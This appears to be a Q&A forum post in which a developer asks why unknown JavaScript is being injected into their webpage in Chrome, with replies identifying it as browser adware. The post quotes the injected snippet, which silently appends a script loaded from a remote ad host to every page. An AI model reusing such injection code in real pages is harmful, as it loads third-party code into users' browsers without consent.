# A javascript is being incorparated into my webpage

Tags: javascript, html

```
javascript: try {
    if (document.body.innerHTML) {
        var a = document.getElementsByTagName("head");
        if (a.length) {
            var d = document.createElement("script");
            d.src = "https://apiadvanceelitec-a.akamaihd.net/gsrs?is=isgiwhIN&bp=BA&g=df8546b3-ae38-4e7c-bc73-e4f227638d89";
            a[0].appendChild(d);
        }
    }
 } catch (e) {}
```

the above line is being executed by the browser Chrome (This code is not apart of my source code)

```
<script type="text/javascript" src="http://apiadvanceelitec-a.akamaihd.net/gsrs?is=isgiwhIN&bp=PBG&g=df8546b3-ae38-4e7c-bc73-e4f227638d89" ></script>
```

this is added to my webproject everytime.
Any idea how to remove it??

Comment: Probably: Remove the malware from your browser that is injecting adverts/sniffers into every page you visit.

Comment: Disable all plugins/extensions. Try another browser, if the problem persists there, it's not bound to Chrome but something worse.

Comment: already disable all plugins

Answer (score 0):

It is Adware Prog. Check this

http://malwaretips.com/blogs/remove-advance-elite-ads-removal-guide/